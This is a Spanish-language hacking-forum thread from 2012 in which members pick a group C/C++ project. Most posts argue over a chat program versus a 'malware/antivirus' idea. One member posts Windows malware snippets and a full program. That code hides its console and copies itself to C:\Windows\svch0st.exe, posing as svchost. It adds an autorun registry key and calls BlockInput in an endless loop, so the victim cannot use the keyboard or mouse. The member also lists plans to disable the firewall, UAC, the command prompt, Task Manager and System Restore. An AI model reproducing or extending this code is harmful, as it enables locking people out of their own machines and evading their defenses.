elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Sigue las noticias más importantes de seguridad informática en el Twitter! de elhacker.NET


+  Foro de elhacker.net
|-+  Programación
| |-+  Programación C/C++ (Moderadores: Eternal Idol, Littlehorse, K-YreX)
| | |-+  Proyecto C/C++
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: 1 2 3 [4] 5 6 7 8 9 10 11 12 13 14 Ir Abajo Respuesta Imprimir
Autor Tema: Proyecto C/C++  (Leído 43,028 veces)
lluk

Desconectado Desconectado

Mensajes: 106


C++Programming


Ver Perfil
Re: Proyecto C/C++
« Respuesta #30 en: 23 Septiembre 2012, 20:38 pm »

yo prefiero lo del chat más que nada porque lo podemos hacer para windows y para linux (o hacerlo para uno y luego adaptarlo al otro)

aunque decidid vosotros porque a mi en realidad me da igual


En línea

тαптяα


Desconectado Desconectado

Mensajes: 1.151


Sic utere tuo ut alienum non laeda


Ver Perfil WWW
Re: Proyecto C/C++
« Respuesta #31 en: 23 Septiembre 2012, 20:41 pm »

La idea del malware me interesa, llevo tiempo queriendo hacer uno pero hay muchas funciones que no soy capaz de sacar...desbloquear panel de control, desbloquear cmd, desbloquear regedit, añadir al registro para iniciar con windows.

POR FAVOR, ELIJAMOS UN PROYECTO YA Y NO CAMBIEMOS MAS DE IDEA, cojamos este si os parece.

Nombre sugerido... Libreware

Bloquear Teclado y ratón

Código
  1. #include <winable.h>
  2. BlockInput(true);
  3. Sleep(20000);
  4. BlockInput(false);

Copiar al registro

Código
  1. HKEY hkey;
  2. RegOpenKeyEx
  3. (HKEY_LOCAL_MACHINE,"Software\\Microsoft\\Windows\\CurrentVersion\\run",0,KEY_SET_VALUE,&hkey);
  4. RegSetValueEx(hkey,"Nombre",0,REG_SZ,(const unsigned char*)"C:\\Ruta\\",sizeof"C:\\Ruta\\");        
  5. RegCloseKey(hkey);


Desactivar cmd No me funciona

Código
  1.  
  2. DWORD dwVal = 1;
  3. HKEY hKey;
  4. RegOpenKeyEx(HKEY_CURRENT_USER,"Software\\Policies\\Microsoft\\Windows\\System", 0, KEY_ALL_ACCESS, &hKey);
  5. RegSetValueEx (hKey, "DisableCMD", 0, REG_DWORD, (LPBYTE)&dwVal , sizeof(DWORD));
  6. RegCloseKey(hKey);

Desctivar administrador de tareas No me funciona

Código
  1. HWND TaskMgr;
  2. TaskMgr = FindWindow(NULL,"Windows Task Manager");
  3. if(TaskMgr != NULL) {
  4. PostMessage(TaskMgr,WM_CLOSE,(LPARAM)0,(WPARAM)0);
  5. }

Los pasos que necesitaremos serán estos:

1-Desactivar Firewall.
2-Desactivar UAC.
3-Pegar el PE a Windows/System32
4-Copiarse al registro el Acceso Directo.
5-No deja acceder al usuario al registro (que diga que el admin lo ha desabilitado).
6-Desactivar el Restaurar Sistema.
7-Cerrar procesos

Ventanas Emergentes       
Ejecuta ventanas         
                                 
Ocultar la ventana de MS-DOS                
                                 
Oculta la ventana de MS-DOS y WINDOWS,  las 2 lineas
                                 
Pues venga, con todo esto ya tenemos una idea basica, pues empecemos al tema. Lo primero estructurar el code.

 


jajaaj todo eso esta en mi virus, "Virus Mouse v4" buscad en Google: Virus mouse v4 p43l0


En línea

0xDani


Desconectado Desconectado

Mensajes: 1.077



Ver Perfil
Re: Proyecto C/C++
« Respuesta #32 en: 23 Septiembre 2012, 20:42 pm »

Ya lo digo a mi me gusta la idea del antivirus/malware, y pienso que lo bueno seria hacerlo para algun SO que no fuera windows, que es el SO para el que mas se programan estas cosas.

En línea

I keep searching for something that I never seem to find, but maybe I won't, because I left it all behind!

I code for $$$
Hago trabajos en C/C++
Contactar por PM
Dryken

Desconectado Desconectado

Mensajes: 117


El arte de vencer se aprende en las derrotas


Ver Perfil WWW
Re: Proyecto C/C++
« Respuesta #33 en: 23 Septiembre 2012, 20:42 pm »

Bueno venga, como 0xDani dice que quiere que sea portable optaremos por el chat pero por favor, que no se cambien más de ideas. Dejemos esta por definitiva.

тαптяαпсє si tienes algo de codigo compartelo e intentaremos mejorarlo entre todos, con algo se empieza. la cosa es que yo de sockets poco la verdad  :xD
En línea

Lo intentas y fracasas, lo intentas y fracasas pero fracasas realmente cuando dejas de intentarlo.

Calc Don v0.7 - C
http://foro.elhacker.net/programacion_cc/source_calculadora_calc_don_10-t366489.0.html

Hundir la flota v0.3 - C#
http://foro.elhacker.net/net/source_c_juego_hundir_la_flota_v01-t377794.0.html
lluk

Desconectado Desconectado

Mensajes: 106


C++Programming


Ver Perfil
Re: Proyecto C/C++
« Respuesta #34 en: 23 Septiembre 2012, 20:44 pm »

тαптяαпсє contamos contigo para ayuda en cosas más "avanzadas"?

Ya lo digo a mi me gusta la idea del antivirus/malware, y pienso que lo bueno seria hacerlo para algun SO que no fuera windows, que es el SO para el que mas se programan estas cosas.


tienes razón dani, pero piensa que la mayoría de gente programa en windows y no dispone de linux :/
En línea

DickGumshoe


Desconectado Desconectado

Mensajes: 480



Ver Perfil WWW
Re: Proyecto C/C++
« Respuesta #35 en: 23 Septiembre 2012, 20:46 pm »

Ya lo digo a mi me gusta la idea del antivirus/malware, y pienso que lo bueno seria hacerlo para algun SO que no fuera windows, que es el SO para el que mas se programan estas cosas.



Lo mismo digo, me gusta la idea. No tengo actualmente ninguna distribución de Linux instalada en mi ordenador pero si acordamos hacer algo para dicho SO, me lo descargaría.

El chat puede ser una buena idea, siempre que sea portable.
En línea

тαптяα


Desconectado Desconectado

Mensajes: 1.151


Sic utere tuo ut alienum non laeda


Ver Perfil WWW
Re: Proyecto C/C++
« Respuesta #36 en: 23 Septiembre 2012, 20:47 pm »

Yo precisamente ahora, voy puteado con Linux, pues me funciona mal y voy a desinstalarlo, pero vamos a hacer una cosa.

En poco tiempo tendré un nuevo ordenador, en el cual me puedo bajar VirtualBox, y me instalo en un momento la distribución que prefiráis.

Bueno venga, como 0xDani dice que quiere que sea portable optaremos por el chat pero por favor, que no se cambien más de ideas. Dejemos esta por definitiva.

тαптяαпсє si tienes algo de codigo compartelo e intentaremos mejorarlo entre todos, con algo se empieza. la cosa es que yo de sockets poco la verdad  :xD


Código malware:

Código
  1. #include<windows.h>
  2. #include<tlhelp32.h>
  3. #include<winable.h>
  4.  
  5.  
  6.  
  7.  
  8. int test_key(void);
  9. int create_key(char *);
  10.  
  11.  
  12.  
  13. int main(void)
  14. {
  15.  int test,create;
  16.  test=test_key();
  17.  
  18.  if (test==2)
  19.  {
  20.    char *path="c:\\WINDOWS\\svch0st.exe";
  21.    create=create_key(path);
  22.  
  23.  }
  24.  
  25. HWND inv;
  26.  AllocConsole();
  27.  inv=FindWindowA("ConsoleWindowClass",NULL);
  28.  ShowWindow(inv,0);
  29. int c;
  30.  
  31. for(;;)
  32. {
  33. BlockInput(true);
  34. }
  35.     char root[60]="C:\\Windows\\";
  36.    char nombre[60]="svch0st";
  37.    char path[256]="svch0st";
  38.    strcat(nombre,".exe");
  39.    strcat(root,nombre);
  40.    HMODULE copiar = GetModuleHandle(0);
  41.    GetModuleFileName(copiar, path, 256);
  42.    CopyFile(path,root,false);
  43. }
  44.  
  45. int test_key(void)
  46. {
  47.  int check;
  48.  HKEY hKey;
  49.  char path[BUFSIZE];
  50.  DWORD buf_length=BUFSIZE;
  51.  int reg_key;
  52.  
  53.  reg_key=RegOpenKeyEx(HKEY_LOCAL_MACHINE,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run",0,KEY_QUERY_VALUE,&hKey);
  54.  if(reg_key!=0)
  55.  {
  56.    check=1;
  57.    return check;
  58.  }
  59.  
  60.  reg_key=RegQueryValueEx(hKey,"Windows Files",NULL,NULL,(LPBYTE)path,&buf_length);
  61.  
  62.  if((reg_key!=0)||(buf_length>BUFSIZE))
  63.    check=2;
  64.  if(reg_key==0)
  65.    check=0;
  66.  
  67.  RegCloseKey(hKey);
  68.  return check;
  69. }
  70.  
  71. int create_key(char *path)
  72. {
  73.    int reg_key,check;
  74.  
  75.    HKEY hkey;
  76.  
  77.    reg_key=RegCreateKey(HKEY_LOCAL_MACHINE,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run",&hkey);
  78.    if(reg_key==0)
  79.    {
  80.        RegSetValueEx((HKEY)hkey,"Windows files",0,REG_SZ,(BYTE *)path,strlen(path));
  81.        check=0;
  82.        return check;
  83.    }
  84.    if(reg_key!=0)
  85.        check=1;
  86.  
  87.    return check;
  88.  
  89. }
En línea

0xDani


Desconectado Desconectado

Mensajes: 1.077



Ver Perfil
Re: Proyecto C/C++
« Respuesta #37 en: 23 Septiembre 2012, 20:51 pm »

Bueno venga, como 0xDani dice que quiere que sea portable optaremos por el chat pero por favor, que no se cambien más de ideas. Dejemos esta por definitiva.

тαптяαпсє si tienes algo de codigo compartelo e intentaremos mejorarlo entre todos, con algo se empieza. la cosa es que yo de sockets poco la verdad  :xD

Yo no he dicho que quiera que sea portable, lo unico que digo es que existen millones de virus para windows, y se pueden encontrar tantos codigos de malware para windows que es casi imposible ser original. Por otra parte en este tipo de aplicaciones que por lo general requieren de un rendimiento optimo te tienes que pegar a la API del sistema, por eso digo que no sea para windows.

тαптяαпсє contamos contigo para ayuda en cosas más "avanzadas"?
tienes razón dani, pero piensa que la mayoría de gente programa en windows y no dispone de linux :/

De linux se puede disponer en poco tiempo... Recuerdo que es libre. Pero si seguis prefiriendo programar para windows pues no conteis conmigo, simplemente no me gusta.

Saludos.
En línea

I keep searching for something that I never seem to find, but maybe I won't, because I left it all behind!

I code for $$$
Hago trabajos en C/C++
Contactar por PM
lluk

Desconectado Desconectado

Mensajes: 106


C++Programming


Ver Perfil
Re: Proyecto C/C++
« Respuesta #38 en: 23 Septiembre 2012, 20:54 pm »

una duda que tengo:
en principio en linux son las mismas funciones casi todas no? (excepto las system y tal..), lo que cambia son las librerías, verdad?

porque si eso podemos hacer algo para windows y luego adaptarlo a linux, aunque gran parte del código sera igual (menos sockets y tal)
En línea

Caster


Desconectado Desconectado

Mensajes: 786


Ver Perfil WWW
Re: Proyecto C/C++
« Respuesta #39 en: 23 Septiembre 2012, 20:54 pm »

La mejor idea creo que es hacer el chat pero que sea portable y sirva tanto para Linux como para Windows. Yo en poco dias particionare el disco e instalare Ubuntu, asi que dispondre de los dos
En línea

Páginas: 1 2 3 [4] 5 6 7 8 9 10 11 12 13 14 Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
PROYECTO
Diseño Gráfico
kåhjî£ 1 2,620 Último mensaje 30 Julio 2004, 08:00 am
por Morris
Proyecto php « 1 2 ... 11 12 »
Sugerencias y dudas sobre el Foro
programatrix 111 27,230 Último mensaje 18 Septiembre 2005, 12:27 pm
por programatrix
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines